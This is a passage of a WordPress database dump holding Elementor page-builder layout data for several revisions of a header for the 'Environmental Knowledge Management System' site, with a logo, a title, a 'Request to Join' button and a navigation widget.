",\"left\":\"60\",\"isLinked\":false}},\"elements\":[{\"id\":\"b19be90\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_tablet\":75},\"elements\":[{\"id\":\"9a4b4e9\",\"elType\":\"widget\",\"settings\":{\"navigation_position\":\"left\",\"navigation_position_mobile\":\"center\",\"navigation_typo_typography\":\"custom\",\"navigation_typo_font_size_tablet\":{\"unit\":\"px\",\"size\":11},\"navigation_typo_font_size_mobile\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"oew-nav\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cd856c0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"aeac97c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"20\"},\"elements\":[{\"id\":\"4a7222f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":15.19500000000000028421709430404007434844970703125},\"elements\":[],\"isInner\":false},{\"id\":\"8554b23\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":84.76699999999999590727384202182292938232421875},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(19535,2860,'_elementor_version','2.7.5'),(19536,2860,'_elementor_template_type','wp-post'),(19540,2861,'_wp_page_template','elementor_canvas'),(19541,2861,'_elementor_edit_mode','builder'),(19542,2861,'_elementor_data','[{\"id\":\"6d6akgq\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"30\",\"padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"60\",\"isLinked\":false},\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"1774e6d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0inpzhi\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"_inline_size_tablet\":33.3299999999999982946974341757595539093017578125},\"elements\":[{\"id\":\"4jd1kd4\",\"elType\":\"widget\",\"settings\":{\"position_mobile\":\"center\"},\"elements\":[],\"widgetType\":\"oew-logo\"}],\"isInner\":false},{\"id\":\"y54k1uv\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":69.4860000000000042064129956997931003570556640625,\"_inline_size_tablet\":33.3299999999999982946974341757595539093017578125,\"css_classes\":\"hide-tablet-mobile\"},\"elements\":[{\"id\":\"d076988\",\"elType\":\"widget\",\"settings\":{\"title\":\"Environmental Knowledge<br> Management System\",\"title_color\":\"#014421\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"900\",\"typography_font_family\":\"Roboto Slab\",\"text_shadow_text_shadow\":{\"horizontal\":16,\"vertical\":0,\"blur\":10,\"color\":\"rgba(0,0,0,0.3)\"},\"typography_line_height\":{\"unit\":\"em\",\"size\":1,\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"4fca764\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":19.28600000000000136424205265939235687255859375},\"elements\":[{\"id\":\"9491976\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Join us to help grow the EKMS Community\",\"align\":\"center\",\"text_color\":\"#014421\",\"typography_typography\":\"custom\",\"typography_font_weight\":\"700\",\"typography_line_height\":{\"unit\":\"em\",\"size\":1.1999999999999999555910790149937383830547332763671875,\"sizes\":[]},\"column_gap\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9096130\",\"elType\":\"widget\",\"settings\":{\"text\":\"Request to Join\",\"link\":{\"url\":\"https:\\/\\/ekms-liberia.mn.co\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"900\",\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#006400\",\"background_color\":\"rgba(0,0,0,0)\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#006400\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"border_color\":\"rgba(1,68,33,0.64)\",\"border_radius\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"v1n7qw8\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#006400\",\"css_classes\":\"owp-sticky\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"141d06c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"1pi8vkg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"638cd9e\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"content_position\":\"middle\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"63323e9\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false}},\"elements\":[{\"id\":\"b19be90\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_tablet\":75},\"elements\":[{\"id\":\"9a4b4e9\",\"elType\":\"widget\",\"settings\":{\"navigation_position\":\"left\",\"navigation_position_mobile\":\"center\",\"navigation_typo_typography\":\"custom\",\"navigation_typo_font_size_tablet\":{\"unit\":\"px\",\"size\":11},\"navigation_typo_font_size_mobile\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"oew-nav\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cd856c0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"aeac97c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"20\"},\"elements\":[{\"id\":\"4a7222f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":15.19500000000000028421709430404007434844970703125},\"elements\":[],\"isInner\":false},{\"id\":\"8554b23\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":84.76699999999999590727384202182292938232421875},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(19543,2861,'_elementor_version','2.7.5'),(19544,2861,'_elementor_template_type','wp-post'),(19548,2862,'_wp_page_template','elementor_canvas'),(19549,2862,'_elementor_edit_mode','builder'),(19550,2862,'_elementor_data','[{\"id\":\"6d6akgq\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"30\",\"padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"60\",\"isLinked\":false},\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"1774e6d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0inpzhi\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"_inline_size_tablet\":33.3299999999999982946974341757595539093017578125},\"elements\":[{\"id\":\"4jd1kd4\",\"elType\":\"widget\",\"settings\":{\"position_mobile\":\"center\"},\"elements\":[],\"widgetType\":\"oew-logo\"}],\"isInner\":false},{\"id\":\"y54k1uv\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":63.3430000000000035242919693700969219207763671875,\"_inline_size_tablet\":33.3299999999999982946974341757595539093017578125,\"css_classes\":\"hide-tablet-mobile\"},\"elements\":[{\"id\":\"d076988\",\"elType\":\"widget\",\"settings\":{\"title\":\"Environmental Knowledge<br> Management System\",\"title_color\":\"#014421\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"900\",\"typography_font_family\":\"Roboto Slab\",\"text_shadow_text_shadow\":{\"horizontal\":16,\"vertical\":0,\"blur\":10,\"color\":\"rgba(0,0,0,0.3)\"},\"typography_line_height\":{\"unit\":\"em\",\"size\":1,\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"4fca764\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25.428999999999998493649400188587605953216552734375},\"elements\":[{\"id\":\"9491976\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Join us to help grow the EKMS Community\",\"align\":\"center\",\"text_color\":\"#014421\",\"typography_typography\":\"custom\",\"typography_font_weight\":\"700\",\"typography_line_height\":{\"unit\":\"em\",\"size\":1.1999999999999999555910790149937383830547332763671875,\"sizes\":[]},\"column_gap\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9096130\",\"elType\":\"widget\",\"settings\":{\"text\":\"Request to Join\",\"link\":{\"url\":\"https:\\/\\/ekms-liberia.mn.co\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"900\",\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#006400\",\"background_color\":\"rgba(0,0,0,0)\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#006400\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"border_color\":\"rgba(1,68,33,0.64)\",\"border_radius\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"v1n7qw8\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#006400\",\"css_classes\":\"owp-sticky\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"141d06c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"1pi8vkg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"638cd9e\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"content_position\":\"middle\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"63323e9\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false}},\"elements\":[{\"id\":\"b19be90\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_tablet\":75},\"elements\":[{\"id\":\"9a4b4e9\",\"elType\":\"widget\",\"settings\":{\"navigation_position\":\"left\",\"navigation_position_mobile\":\"center\",\"navigation_typo_typography\":\"custom\",\"navigation_typo_font_size_tablet\":{\"unit\":\"px\",\"size\":11},\"navigation_typo_font_size_mobile\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"oew-nav\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cd856c0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"aeac97c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"20\"},\"elements\":[{\"id\":\"4a7222f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":15.19500000000000028421709430404007434844970703125},\"elements\":[],\"isInner\":false},{\"id\":\"8554b23\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":84.76699999999999590727384202182292938232421875},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(19551,2862,'_elementor_version','2.7.5'),(19552,2862,'_elementor_template_type','wp-post'),(19556,2863,'_wp_page_template','elementor_canvas'),(19557,2863,'_elementor_edit_mode','builder'),(19558,2863,'_elementor_data','[{\"id\":\"6d6akgq\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"30\",\"padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"60\",\"isLinked\":false},\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"1774e6d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0inpzhi\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"_inline_size_tablet\":33.3299999999999982946974341757595539093017578125},\"elements\":[{\"id\":\"4jd1kd4\",\"elType\":\"widget\",\"settings\":{\"position_mobile\":\"center\"},\"elements\":[],\"widgetType\":\"oew-logo\"}],\"isInner\":false},{\"id\":\"y54k1uv\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":65.7600000000000051159076974727213382720947265625,\"_inline_size_tablet\":33.3299999999999982946974341757595539093017578125,\"css_classes\":\"hide-tablet-mobile\"},\"elements\":[{\"id\":\"d076988\",\"elType\":\"widget\",\"settings\":{\"title\":\"Environmental Knowledge<br> Management System\",\"title_color\":\"#014421\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"900\",\"typography_font_family\":\"Roboto Slab\",\"text_shadow_text_shadow\":{\"horizontal\":16,\"vertical\":0,\"blur\":10,\"color\":\"rgba(0,0,0,0.3)\"},\"typography_line_height\":{\"unit\":\"em\",\"size\":1,\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"align\":\"left\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"4fca764\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":23.01200000000000045474735088646411895751953125},\"elements\":[{\"id\":\"9491976\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Join us to help grow the EKMS Community\",\"align\":\"center\",\"text_color\":\"#014421\",\"typography_typography\":\"custom\",\"typography_font_weight\":\"700\",\"typography_line_height\":{\"unit\":\"em\",\"size\":1.1999999999999999555910790149937383830547332763671875,\"sizes\":[]},\"column_gap\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9096130\",\"elType\":\"widget\",\"settings\":{\"text\":\"Request to Join\",\"link\":{\"url\":\"https:\\/\\/ekms-liberia.mn.co\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"900\",\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#006400\",\"background_color\":\"rgba(0,0,0,0)\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#006400\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"border_color\":\"rgba(1,68,33,0.64)\",\"border_radius\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"v1n7qw8\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#006400\",\"css_classes\":\"owp-sticky\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"141d06c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"1pi8vkg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"638cd9e\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"content_position\":\"middle\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"63323e9\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false}},\"elements\":[{\"id\":\"b19be90\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_tablet\":75},\"elements\":[{\"id\":\"9a4b4e9\",\"elType\":\"widget\",\"settings\":{\"navigation_position\":\"left\",\"navigation_position_mobile\":\"center\",\"navigation_typo_typography\":\"custom\",\"navigation_typo_font_size_tablet\":{\"unit\":\"px\",\"size\":11},\"navigation_typo_font_size_mobile\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"oew-nav\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cd856c0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"aeac97c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"20\"},\"elements\":[{\"id\":\"4a7222f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":15.19500000000000028421709430404007434844970703125},\"elements\":[],\"isInner\":false},{\"id\":\"8554b23\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":84.76699999999999590727384202182292938232421875},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(19559,2863,'_elementor_version','2.7.5'),(19560,2863,'_elementor_template_type','wp-post'),(19564,2864,'_wp_page_template','elementor_canvas'),(19565,2864,'_elementor_edit_mode','builder'),(19566,2864,'_elementor_data','[{\"id\":\"6d6akgq\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"30\",\"padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"60\",\"isLinked\":false},\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"1774e6d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0inpzhi\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":10.7750000000000003552713678800500929355621337890625,\"_inline_size_tablet\":33.3299999999999982946974341757595539093017578125},\"elements\":[{\"id\":\"4jd1kd4\",\"elType\":\"widget\",\"settings\":{\"position_mobile\":\"center\"},\"elements\":[],\"widgetType\":\"oew-logo\"}],\"isInner\":false},{\"id\":\"y54k1uv\